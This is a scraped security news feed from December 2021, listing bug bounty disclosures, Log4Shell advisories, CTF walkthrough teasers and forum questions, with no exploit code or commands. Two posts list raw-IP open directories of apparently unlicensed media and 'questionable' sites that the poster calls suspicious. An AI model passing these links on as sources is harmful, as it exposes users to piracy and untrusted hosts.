    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000
  • Open

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-15 Review
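    Complete course videos for "Software Analysis" by ourren; The dilemmas and blind spots of engineering asset risk operations, as seen from the Log4shell incident by ourren. For more of the latest articles, visit SecWiki  ( 2 min )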
  • Open

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
  • Open

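    [Security Bulletin] Microsoft's December Patch Tuesday fixes multiple high-risk vulnerabilities
    Microsoft recently released its December security patches, fixing a total of 67 CVE vulnerabilities in Microsoft products, of which 7 are critical and 60 are high-risk. Affected products include Windows and Windows components, ASP.NET Core and Vis...  ( 2 min )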

  • Open

    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
    Article URL: https://github.com/cisagov/log4j-affected-db Comments URL: https://news.ycombinator.com/item?id=29559856 Points: 24 # Comments: 0  ( 2 min )
    CVE in Apache Log4j 2.15.0 was incomplete in certain non-default configurations
    Article URL: https://www.cve.org/CVERecord?id=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29558106 Points: 2 # Comments: 0
    Separate Log4j DOS Vulnerability – CVE-2021-45046
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046 Comments URL: https://news.ycombinator.com/item?id=29556414 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-4102: RCE in Chromium actively being exploited
    Article URL: https://security.archlinux.org/CVE-2021-4102 Comments URL: https://news.ycombinator.com/item?id=29555514 Points: 9 # Comments: 0
    CVE-2021-45046: Apache Log4j2 2.16.0 is out
    Article URL: https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f Comments URL: https://news.ycombinator.com/item?id=29554725 Points: 10 # Comments: 1
  • Open

    Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
    An attacker may exploit the Windows Task Scheduler to schedule malicious programmes for initial or recurrent execution. For persistence purposes, an attacker may utilise Windows The post Windows Privilege Escalation: Scheduled Task/Job (T1573.005) appeared first on Hacking Articles.  ( 6 min )
    DarkHole: 2 Vulnhub Walkthrough
    DarkHole: 2 is a medium-hard machine created by Jihad Alqurashi for Vulnhub. This system is also put through its paces in VirtualBox. This lab is The post DarkHole: 2 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Levels of Fuzzing (2013)
    Article URL: https://blog.regehr.org/archives/1039 Comments URL: https://news.ycombinator.com/item?id=29556976 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Tips for DFIR Analysts, pt VI
    Context & Finding Persistence I was looking into an unusual mechanism for launching applications recently, and that research brought back a recurring issue I've seen time and again in the industry, specifically pivoting from one data point to another based on knowledge of the underlying system. Very often, during SOC monitoring or live response, we'll find a process executing via EDR telemetry (or some other means) and have no clear understanding of the mechanism that launched that process. Sometimes, we may have the data available to assist us in discovering the root cause of the process launch; for example, in the case of processes launched via web shell, all you need to do is trace backward through the process tree until you get to the web server process (i.e., w3wp.exe, etc.). Other ti…  ( 6 min )
  • Open

    Any good tools for forensic analyzing a MariaDB?
    Dear community, What would you use to analyze a MariaDB forensically? I found https://github.com/pr4xx/db-forensic-framework on GitHub but would like to hear what you are using? Anything helps, thank you submitted by /u/Civil-Lion-4602 [link] [comments]  ( 1 min )
    I'm currently studying to transition from a SIEM administrator to a network forensics analyst. What are good workflows/resources for analyzing PCAPs?
    Hey community, 24 years old SIEM administrator who's currently self-studying to become a network forensics analyst. I'm reading books/watching youtube videos/doing some SANS and Chris Sanders courses but I want to hear from the subreddit - what's a good workflow or some tips when starting to analyze PCAPS? I have a lab with Brim, Suricata, and Snort that I play with. Assuming I'm tasked with analyzing a PCAP that is related to an incident of some sort, what would be good pointers and procedures to follow? what would be things that I would want to look for, and how do I find them? Thanks in advance! submitted by /u/HeliosHype [link] [comments]  ( 2 min )
    Are books in the FAQ still relevant?
    Some of them are from 2009 to 2013. Can anyone suggest more recent books? Or are those books still the best? Also what CTF website do you recommend specified for digital forensics ? submitted by /u/NinjaShmurtle [link] [comments]  ( 2 min )
    Recommendations for Targeted Diff Searches
    I’m looking to cross reference forensic data dumps from two different devices. Are there any tools (preferably open source) that can compare file contents between two different folders and print matching values? submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-14 Review
    A brief discussion of passive IAST products and their technical implementation by ourren. For more of the latest articles, visit SecWiki
  • Open

    Gaining access to a network with Office macros — Pentesting and red teaming
    Explaining the usage of malicious Office macros to gain access to a target’s network as a red teamer. Continue reading on Medium »  ( 3 min )
  • Open

    Am I getting ghosted by MITRE ?
    Hello there, I sent a request for some CVEs last week (on Thursday) to MITRE - CNA, for some bugs that I found in an open-source project, the bugs have been acknowledged by the vendor and patched. It's Tuesday today and aside from the automated email right after the request they didn't come back to me. Is this normal? Does it usually take that long? submitted by /u/Glum_Gur2093 [link] [comments]  ( 1 min )
  • Open

    Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read
    Aiven Ltd disclosed a bug submitted by j0v: https://hackerone.com/reports/1415820 - Bounty: $1000
    Universal Cross-Site Scripting vulnerability
    Proctorio disclosed a bug submitted by sector7-nl: https://hackerone.com/reports/1326264
  • Open

    Audiobooks, podcasts & tutti quanti
    http://120.29.58.149:8888/Audiobooks/ http://51.198.90.160/resources/AudioBooks/ http://173.208.202.90:8080/audiobooks/Martin%2C%20George%20R.%20R.%20-%20A%20Clash%20of%20Kings http://27.32.91.221/Audiobooks/ (Movies, TV shows and music in other dirs) http://www.vicenet.org/book/Lifespan%20Why%20We%20Age%20-%20and%20Why%20We%20Don't%20Have%20To/ http://67.82.39.229:88/DandD/Audio/Chris%20Perkins%20DM/ (including D&D stuff) http://winnow.veeshanvault.org/files/Audio/ Podcasts: http://teknosophy.com/episodes/ German podcasts on OSS: http://159.69.132.234/ submitted by /u/krazybug [link] [comments]  ( 2 min )
    WikiLeaks - Can Anyone Confirm New Data Dumped Tonight?
    submitted by /u/Aphix [link] [comments]

  • Open

    [dubsmash] Username and password bruteforce
    Reddit disclosed a bug submitted by asce21: https://hackerone.com/reports/1165225 - Bounty: $100
    com.reddit.frontpage vulnerable to Task Hijacking (aka StrandHogg Attack)
    Reddit disclosed a bug submitted by nexus2k: https://hackerone.com/reports/1325649
    [dubsmash] Long String in 'shoutout' Parameter Leading Internal server Error on Popular hashtags , Community and User Profile
    Reddit disclosed a bug submitted by sandeep_rj49: https://hackerone.com/reports/1237428 - Bounty: $1000
    No Rate limit on change password leads to account takeover
    Reddit disclosed a bug submitted by dreamispossible: https://hackerone.com/reports/1165285
    Vulnerabilities in exported activity WebView
    Shipt disclosed a bug submitted by shell_c0de: https://hackerone.com/reports/414101 - Bounty: $350
    Error Page Content Spoofing or Text Injection
    Judge.me disclosed a bug submitted by tefa_: https://hackerone.com/reports/1421413
  • Open

    Through the years..Movies,TV, Software, etc...
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
    Christmas movies and other Christmas stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    The first list contains mostly PDF and EPUB files. The second is a list of questionable/unexplored/interesting directories.
    Plus an appreciation repost for this post about Calishot and the terabytes of data being hosted. Adding NSFW flare for the unexplored directories, and for the nature of https://ihatefeds.com ‘s content. PDFs: https://lira.epac.to/DOCS-TECH/Security/ https://lira.epac.to/DOCS-TECH/ https://www.miralishahidi.ir/resources/ https://www.kgay4all.com/seioqueseiporleroqueleio/ https://theswissbay.ch/pdf/ http://index-of.es http://s28.bitdl.ir/?C=N&O=A -(edit)-a lot of files with the same size and overall feels a bit sus. Proceed with extra caution. https://ihatefeds.com http://www.aetkin.com/files/Real%20Analysis%20Qual%20Study%20Questions/ http://mis.kp.ac.rw/admin/admin_panel/kp_lms/files/digital/ http://incompleteideas.net/book/ Questionable directories https://ebook-mecca.com/ebooks/?SA http://47.219.34.42:8081/Files/ -(edit)-I think he’s dead, Jim. https://docs.spring.io/spring-amqp/docs/ https://docs.jboss.org/weld/reference/ https://www.scons.org/doc/ https://www.unicode.org/Public/ https://www.unicode.org/Public/UCD/latest/charts/ https://ftp.rush.edu/users/molebio/ https://www.nsula.edu/documentprovider/docs/ https://spdf.gsfc.nasa.gov/pub/software/cdf/doc/ https://bannerwitcoff.com/wp-content/uploads/ https://www.uvm.edu/~swac/docs/ http://ftp.axis.com • https://www.orfeo-toolbox.org/packages/ci/CookBook/ Directory- https://www.orfeo-toolbox.org/packages/ci/ submitted by /u/Ok_Strawberry7053 [link] [comments]
  • Open

    Seal HackTheBox Walkthrough
    Seal is a CTF Linux machine rated as medium difficulty on Hack the Box platform. So let's get started and deep dive into breaking down The post Seal HackTheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Imaging Software
    What freeware beside Paladin do you use for imaging after booting? Any suggestions? submitted by /u/Civil_Structure_1033 [link] [comments]  ( 1 min )
    Diavol Ransomware
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )
  • Open

    Finding the log4j RCE With Fuzzing
    Article URL: https://www.code-intelligence.com/blog/java-fuzzing-log4j-rce Comments URL: https://news.ycombinator.com/item?id=29541779 Points: 1 # Comments: 1  ( 1 min )
  • Open

    SecWiki News 2021-12-13 Review
    SecWiki Weekly (Issue 406) by ourren; The in-the-wild spread of Log4Shell as seen through a cryptomining trojan sample by Avenger. For more of the latest articles, visit SecWiki
  • Open

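    [Security Bulletin] Apache Log4j2 remote code execution vulnerability
    A remote code execution vulnerability in Apache Log4j2 has recently surfaced online. An attacker can exploit it by crafting a special data request packet, ultimately triggering remote code execution. Because the vulnerability's impact is extremely broad, users are advised to...  ( 4 min )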
  • Open

    Can we find Log4Shell with Java Fuzzing? 🔥 (CVE-2021-44228 - Log4j RCE)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Monitoring events through the OSINT system to ensure the information security of the organization
    Today OSINT (Open Source Intelligence) term is used in different aspects. Continue reading on Medium »  ( 5 min )
  • Open

    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Coinmonks »  ( 2 min )
    Fuzzing Wasabi RPC
    Using Burp Suite Continue reading on Medium »  ( 2 min )
  • Open

    How to mint and trade your NFTs with X.XYZ
    x.xyz is an NFT trading platform with almost zero gas; X runs on the Fantom network, so Continue reading on Medium »  ( 2 min )

  • Open

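    Self-Hosted Interactsh for Private OOB Testing
    This weekend the internet is truly on fire because of log4shell. Security staff will now be responding to it and scanning their assets. The representative identification method used here, OOB (Out-Of-Band), can be tested conveniently with well-known services (ZAP OAST, Burpsuite collaborator, Interactsh, etc.), but this ultimately leaves the IP of the server that made the callback with an external party, which creates a point where information such as the company or group operating that service can be obtained. (Not a great picture.) So today I'd like to talk about how to build and use a separate interactsh server with a VPC and DNS glue records so that OOB can be tested privately.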
  • Open

    HackMyVM — Furious
    Writeup (Spanish) Continue reading on Medium »  ( 3 min )
  • Open

    Finding a deleted file without having a file name
    tldr; need to find a file that may or may not have been on 3 separate windows PCs. only definitive info i have is the file itself, which is a pdf of a scanned document. file was deleted 2019 and removed from recycle bin. hey all not sure where to start here, hoping someone can point me in the right direction. ive got a pdf file of a scanned document. that is all i know about the file. not sure if the name would have been changed, if it was originally a .docx, nothing. my first question is how to find it if it isnt deleted? i opened it up in notepad, grabbed a unique string from the file and then searched using 'Everything' (voidtools) but it was hit or miss as to if it found it 2nd question is how to find it if it was deleted. the file dates back to 2019 and these computers are used on a daily basis, so im not very hopeful the data wouldnt have been overwritten by now. thanks in advance submitted by /u/mat7688 [link] [comments]  ( 2 min )
    Biggest dreams in the field?
    Something a little different. What do you hope to accomplish in your career? Opening up your own firm? New research? I am just curious. submitted by /u/FAlady [link] [comments]  ( 1 min )
    Mobile phone and MacOS forensic tools
    I’m going to be attending SANS DFIR netwars and I’m confident everywhere except smartphones and macOS. I know we’ll be given apple hfs/apfs and iOS and android acquisitions which I’m not sure how to even approach. So was wondering if anybody had some good resources on how to tackle them submitted by /u/KennethsFreq [link] [comments]  ( 1 min )
  • Open

    A galore of animated movies, series and anime to prepare your Christmas time in family
    http://109.120.203.163/lvm/animation%20and%20puppets/ http://185.141.213.228/Animation/ https://185.107.32.136/Animation/ http://tajmovie.ir/Animation/ https://dl1.zflix.ir/Animation/ https://dl3.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ https://dl1.fastmovie.ir/Movie/Animation/ https://dl5.5fghhui78jnkopqwccgo2hellru6.xyz/Animation/ http://46.4.39.111/--KIDS-SERIES/ Anime: http://75.86.210.23/archive/ANIMU/ http://neet.rehab/anime/ == https://149.28.180.59/anime/ http://51.158.151.61:8080/Animoos/ http://148.251.73.149/Anime&Manga/ http://149.28.180.59/anime/ http://149.28.180.59/anime/ http://509.rbx.abcvg.ovh/ submitted by /u/krazybug [link] [comments]  ( 4 min )
  • Open

    Exploit samAccountName spoofing with Kerberos
    submitted by /u/dmchell [link] [comments]
  • Open

    add class vulnerable Stored XSS
    Mail.ru disclosed a bug submitted by mrirfan__07: https://hackerone.com/reports/1215179

  • Open

    Chronos Vulnhub Walkthrough
    Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has The post Chronos Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    RXSS - http://macademy.mtnonline.com
    MTN Group disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/1091165
    Missing captcha and rate limit protection in help form
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1165223
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #1
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397601 - Bounty: $3000
    [BrakTooth] Bluetooth vulnerability allows attacker to disconnect or deny reconnection to BT devices connected to a target. Attack #2
    Intel Corporation disclosed a bug submitted by matheus_garbelini: https://hackerone.com/reports/1397602 - Bounty: $3000
  • Open

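    Log4shell: the internet is on fire worldwide 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    Yes, just yesterday (2021-12-10) an RCE 0-day vulnerability was disclosed in log4j2, Java's logging package. As long as logs can be written to a service or application, an attack is possible in any environment, and since the risk is RCE, the whole world really is on fire. (Haha, my DMs are blowing up too. I'm not going to look……) Work comes first, so yesterday I focused on the response, and I'm sharing this in writing today, a day late. Where are you going… it's actually not over yet… Afterwards there was more to respond to with the follow-ups CVE-2021-45046 and CVE-2021-45105, so I think I spent the time from the initial disclosure on Friday through the following week in a frenzy. Anyway, my respect to every security engineer, developer, DevOps engineer and everyone else who worked hard because of this incident 👏🏼
    Browser Addons for Web Hackers
    Do you use many web browser addons when doing security testing? At one time I installed and used a huge number of them, but these days I seem to keep it under five. Today I'd like to introduce addons that are useful for security testing and share how my usage has changed. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store Changes: I used to use a lot of browser addons.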

  • Open

    Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28)
    We provide background and a root cause analysis of CVE-2021-44228, a remote code execution vulnerability in Apache log4j, and we recommend mitigations. The post Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 28) appeared first on Unit42.
  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post shows how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )
  • Open

    Quick Guide: Go 1.18 Features
    With the Go 1.18 version, which is planned to be released in the first quarter of 2022, many new features are waiting for us. Continue reading on Medium »  ( 4 min )
    What's Coming with Go 1.18?
    Many new features await us with Go 1.18, which is planned for release in the first quarter of 2022. Continue reading on Medium »  ( 2 min )
  • Open

    Trivial RCE in log4j
    submitted by /u/dfv157 [link] [comments]
    Evasion Adventures
    submitted by /u/grandstream [link] [comments]
  • Open

    Looking for career advice
    Please remove this if it doesn't fit in with this sub, I'm asking here because this seems to be the most common place to discuss appsec. A little about myself: I'm currently working in a helpdesk role in Australia and have been practicing both offensive netsec and web application security/exploit dev for a little while. I like both netsec and appsec but netsec bores me a little bit and I really enjoy coding/learning about applications and exploiting them. The issue I'm having is that helpdesk work seems to line up nicely with network pentesting, and I don't have a degree or any development experience. But with that said I'd really enjoy doing application security as a career. Does anyone have any advice in regards to entering the application security world from a support role? Or would it be better for me to pursue network security and then try to switch to application security later? Also should I pursue any certs that might help? I've thought about OSWE in the future. Any advice would be great, and again if this post doesn't belong here I can delete. Thanks. submitted by /u/n3v327311 [link] [comments]  ( 2 min )

  • Open

    Endpoint without access control leads to order informations and status changes
    Azbuka Vkusa disclosed a bug submitted by cabelo: https://hackerone.com/reports/1050753 - Bounty: $1000
    Misconfiguration Certificate Authority Authorization Rule
    Sifchain disclosed a bug submitted by d4rk_r0s3: https://hackerone.com/reports/1186740
    Linux Desktop application "sifnoded" executable does not use Pie / no ASLR
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188633
    CORS (Cross-Origin Resource Sharing) origin validation failure
    Sifchain disclosed a bug submitted by 11holefinder: https://hackerone.com/reports/1192147
    Vulnerability : Email Spoofing
    Sifchain disclosed a bug submitted by tajammul: https://hackerone.com/reports/1180668
    No valid SPF record found
    Sifchain disclosed a bug submitted by tamilarasi11: https://hackerone.com/reports/1187001
    Username disclosure at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188662
    Design Issues at Main Domain
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188652
    No Rate Limit in email leads to huge Mass mailings
    Sifchain disclosed a bug submitted by sudhakarsurya: https://hackerone.com/reports/1185903
    Information Disclosure at one of your subdomain
    Sifchain disclosed a bug submitted by omemishra: https://hackerone.com/reports/1195423
    Sifchain Privacy Policy Webpage Uses Wordpress Default Template. Does Not Display Correct Privacy Policy.
    Sifchain disclosed a bug submitted by masq31: https://hackerone.com/reports/1196049
    Clickjacking /framing on sensitive Subdomain
    Sifchain disclosed a bug submitted by ilxax1: https://hackerone.com/reports/1195209
    No Valid SPF Records at sifchain.finance
    Sifchain disclosed a bug submitted by n33dm0n3y: https://hackerone.com/reports/1188725
    Session Token in URL
    Sifchain disclosed a bug submitted by little_one: https://hackerone.com/reports/1197078
    CSRF in newsletter form
    Sifchain disclosed a bug submitted by ph0b0s: https://hackerone.com/reports/1190705
    Wrong Implementation of Url in https://docs.sifchain.finance/
    Sifchain disclosed a bug submitted by sar00n: https://hackerone.com/reports/1198877
    Wrong Url in Main page of sifchain.finance
    Sifchain disclosed a bug submitted by beebeek: https://hackerone.com/reports/1195512
    Clickjacking at sifchain.finance
    Sifchain disclosed a bug submitted by manjithgowthaman: https://hackerone.com/reports/1212595
    clickjacking vulnerability
    Sifchain disclosed a bug submitted by sravani_1234: https://hackerone.com/reports/1199904
    Clickjacking
    Sifchain disclosed a bug submitted by v_t: https://hackerone.com/reports/1206138
    information disclosure
    Sifchain disclosed a bug submitted by virus26: https://hackerone.com/reports/1218784
    Possible Database Details stored in values.yaml
    Sifchain disclosed a bug submitted by sparta5537: https://hackerone.com/reports/1199803
    Sifchain token leak
    Sifchain disclosed a bug submitted by abdullah321: https://hackerone.com/reports/1188938
    ETHEREUM_PRIVATE_KEY leaked via github
    Sifchain disclosed a bug submitted by bugkillerak: https://hackerone.com/reports/1283605
    4 xss vulnerability dom based cwe 79 ; wordpress bootstrap.min.js is vulnerable
    Sifchain disclosed a bug submitted by rao_ji1hackerone: https://hackerone.com/reports/1219002
    Signature Verification /// golang.org/x/crypto/ssh
    Sifchain disclosed a bug submitted by dpredrag: https://hackerone.com/reports/1276384
    Origin IP Disclosure Vulnerability
    Sifchain disclosed a bug submitted by uniquekamboj6738: https://hackerone.com/reports/1327443
    Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.
    Sifchain disclosed a bug submitted by 0xcachefl0w: https://hackerone.com/reports/1187816
    Email Spoofing bug
    Sifchain disclosed a bug submitted by niloychowdhury3: https://hackerone.com/reports/1176090
    [34.96.80.155] Server Logs Disclosure lead to Information Leakage
    Evernote disclosed a bug submitted by huntinex: https://hackerone.com/reports/1398270 - Bounty: $150
    Exposed kubernetes dashboard
    8x8 disclosed a bug submitted by bugkill3r: https://hackerone.com/reports/1418101
  • Open

    Chrome on Windows performance improvements and the journey of Native Window Occlusion
    Whether you prefer organizing your browser with tab groups, naming your windows, tab search, or another method, you have lots of features that help you get to the tabs you want. In this The Fast and the Curious post, we describe how we use what windows are visible to you to optimize Chrome, leading to 25.8% faster start up and 4.5% fewer crashes. Background For several years, to improve the user experience, Chrome has lowered the priority of background tabs[1]. For example, JavaScript is throttled in background tabs, and these tabs don’t render web content. This reduces CPU, GPU and memory usage, which leaves more memory, CPU and GPU for foreground tabs that the user actually sees. However, the logic was limited to tabs that weren't focused in their window, or windows that were minimiz…
  • Open

    Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering
    Patient zero web threats are malicious URLs that are being seen for the first time. We discuss how to stop them despite attacker cloaking techniques. The post Detecting Patient Zero Web Threats in Real Time With Advanced URL Filtering appeared first on Unit42.

  • Open

    State of the Subreddit #3
    Greetings everyone in r/asknetsec, I hope everyone is doing well and getting ready for the holidays. All the moderators here wish you a relaxing and safe time with your families and friends. Hopefully we all will get a breather from the crazy world of Cyber Security and Networking. A couple of updates right off the bat – We’ve noticed an uptick in traffic for the subreddit over the past couple of months. Page views are up roughly 35% since the all-time lows of June-July when the subreddit was locked from the original admin. We are very happy with the increase, as it allows more collaboration and questions to be answered. Survey requests are no longer accepted on the subreddit going forward. We had a bit of a conversation internally on this topic as they seem to come up once or twice a week. Usually these are from college students requesting information for a class or study. We wish to continue and help anyone in school to best of our ability, but most of the time these surveys results are not shared publicly, and only benefit the survey creator. Due to this we don’t see it beneficial to include them. We’ve added surveys to rule 2 of what is relevant to the subreddit. Going into the new year, we hope to start providing everyone with some AMAs from verified industry professionals. We’ve been talking about this internally for a bit. State of the subreddit posts will most likely continue once every quarter (3 months). Thanks to everyone for continuing to contribute to the subreddit and continuing to report posts that break the rules. Even if you are unsure, your reports are appreciated. Have a fantastic holiday, and if you need anything, don’t hesitate to reach out to us directly. -AskNetSec Mod Team submitted by /u/Envyforme [link] [comments]  ( 1 min )
  • Open

    Process Ghosting - EDR Evasion
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    FIN13: A Cybercriminal Threat Actor Focused on Mexico
    submitted by /u/dmchell [link] [comments]
    Multiple Vulnerabilities in AWS and Other Major Cloud Services
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    [Transportation Management Services Solution 2.0] Improper authorization at tmss.gsa.gov leads to data exposure of all registered users
    U.S. General Services Administration disclosed a bug submitted by alexandrio: https://hackerone.com/reports/1175980
    php info file and sql backup at vendor's subdomain
    Semrush disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1358249 - Bounty: $200
    Account Takeover through registration to the same email address
    QIWI disclosed a bug submitted by avolume: https://hackerone.com/reports/1224008 - Bounty: $100
    [allods.mail.ru] - WebCache Poisoning Host Header lead to Potential Stored XSS
    Mail.ru disclosed a bug submitted by 0xd0ff9: https://hackerone.com/reports/1262408

  • Open

    Explore Hackthebox Walkthrough
    “Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, The post Explore Hackthebox Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    CORS origin validation failure
    UPchieve disclosed a bug submitted by jupiter-47: https://hackerone.com/reports/1404986
    Authentication Bypass - Email Verification code bypass in account registration process.
    UPchieve disclosed a bug submitted by anas_44: https://hackerone.com/reports/1406471
    Bypass a fix for report #708013
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1363672 - Bounty: $3500
    Guard WKS lookup: Evil WKS server forces connections to last forever
    Open-Xchange disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1016691 - Bounty: $444
    Blind XSS
    Rocket.Chat disclosed a bug submitted by cyberasset: https://hackerone.com/reports/1091118
  • Open

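    [Security Advisory] Grafana unauthenticated arbitrary file read 0-day vulnerability
    Recently, a 0-day vulnerability allowing unauthenticated arbitrary file read in Grafana has appeared online; details of the vulnerability have not yet been made public. An attacker can use this vulnerability to read arbitrary files on the host without authentication.  ( 1 min )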
  • Open

    WHY fuzzers MISSED this buffer-overflow in Mozilla NSS library? 🤦‍♂️ (CVE-2021-43527 explained)
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Suspected Russian Activity Targeting Government and Business Entities Around the Globe
    submitted by /u/dmchell [link] [comments]
  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion
    Evernote disclosed a bug submitted by neolexsecurity: https://hackerone.com/reports/1189367 - Bounty: $5000
    IDOR to view order information of users and personal information
    Affirm disclosed a bug submitted by xfiltrer: https://hackerone.com/reports/1323406 - Bounty: $500
    xss is triggered on your web
    Shopify disclosed a bug submitted by jaka_tingkir: https://hackerone.com/reports/1121900 - Bounty: $2900
    [h1-2102] Wholesale - CSRF to Generate Invitation Token for a Customer and Move Customer to Invited Status
    Shopify disclosed a bug submitted by rhynorater: https://hackerone.com/reports/1091209 - Bounty: $500
  • Open

    Detection and Response for Linux Reflective Code Loading Malware— This is How
    submitted by /u/elixirelixir [link] [comments]
    Reflective Code Loading in Linux — A New Defense Evasion Technique in MITRE ATT&CK v10
    submitted by /u/elixirelixir [link] [comments]
  • Open

    How is timeless debugging ( reverse debugging ) good? Insight needed
    Any statistical data would be really appreciated. Thanks in advance. submitted by /u/h3ll0-fr13nd [link] [comments]  ( 1 min )
  • Open

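    Controlling the ZAP RootCA with the API and Cli-Arguments
    A new add-on has been added to ZAP. With this add-on, ZAP's certificate, that is, the Root CA, can be controlled through the API or the CLI. This makes certificate handling a little easier when running in daemon mode or in a CI/CD pipeline. Today, let's look at the Network add-on, which makes it easy to handle ZAP's RootCA (the certificate) through API/CLI arguments, and at how it works 🚀 Network addon The Network add-on does not have any special features of its own; it is an add-on added to support ZAP's certificate handling.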

  • Open

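    [Translation] Facebook traffic routing best practices: full-path XDP/BPF infrastructure from the public internet entry point to internal services (LPC, 2021)
    Translator's preface This article is a translation of a talk Facebook gave at LPC 2021: From XDP to Socket: Routing of packets beyond XDP with BPF. The title could be rendered literally as "(Full-path) traffic routing from XDP to socket: where XDP falls short, BPF fills in", because XDP runs on the NIC, at the boundary and traffic entry point, and cannot reach the rest of the path (especially once packets are in the kernel protocol stack), so other BPF techniques were brought in to "relay" the routing process. Also, "routing" here does not mean layer-3 routing by routers in the narrow sense, but L3-L7 traffic forwarding in general. Some links and code snippets were added during translation to aid understanding. Given the translator's limited ability, omissions or errors are inevitable; if in doubt, please consult the original. The translation follows. Translator's preface 1 Introduction 1.1 Prior work 1.2 Facebook traffic infrastructure 1.3 Challenges 2 Selecting the backend host: consistent and stateless routing of traffic within the data center (L4 load balancing) 2.1 Katran (L4LB) load-balancing mechanism 2.2 Limitations of consistent hashing 2.2.1 Fault tolerance: backend failures disturbing unrelated connections 2.2.2 Problems for long-lived TCP connections 2.2.3 Why QUIC is unaffected connection_id Fully stateless L4 routing 2.3 Solution for TCP connections: using BPF to embed backend server information in the TCP header 2.3.1 Principle and flow 2.3.2 Overhead Data overhead: 6 extra bytes in the TCP header Runtime overhead: not noticeable 2.3.3 Implementation details Socket events listened for Maintaining the TCP flow -> server_id mapping Allocation and synchronization of server_id 2.3.4 Results 2.3.5…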

  • Open

    Invoke-PSImage PowerShell Class Project
    A partner and I are in charge of creating a class exercise to show examples of steganography and potential malware. With some research, we discovered Invoke-PSImage on GitHub (GitHub Link). We want to just show how to first input a secret message via steganography with PowerShell and then show how you can input "safe" malware like opening a youtube link from opening the image. So far it isn't working and online tutorials haven't been much help. Does anyone have any experience with this module or know of any other tools that we could use? It is also due tonight 😂 submitted by /u/zacattac1 [link] [comments]  ( 1 min )
  • Open

    Recaptcha Secret key Leaked
    Paragon Initiative Enterprises disclosed a bug submitted by kashifinfo90: https://hackerone.com/reports/1416665
    Authenticated kubernetes principal with restricted permissions can retrieve ingress-nginx serviceaccount token and secrets across all namespaces
    Kubernetes disclosed a bug submitted by libio: https://hackerone.com/reports/1249583 - Bounty: $2500
    Staff can use BULK_OPERATIONS_FINISH webhook topic using Graphql without permissions all
    Shopify disclosed a bug submitted by yinvi777: https://hackerone.com/reports/1350095 - Bounty: $600
  • Open

    TryHackMe | Beginner | Advent of Cyber 3 (2021) | Web Exploitation | Fuzzing in Burp Suite |…
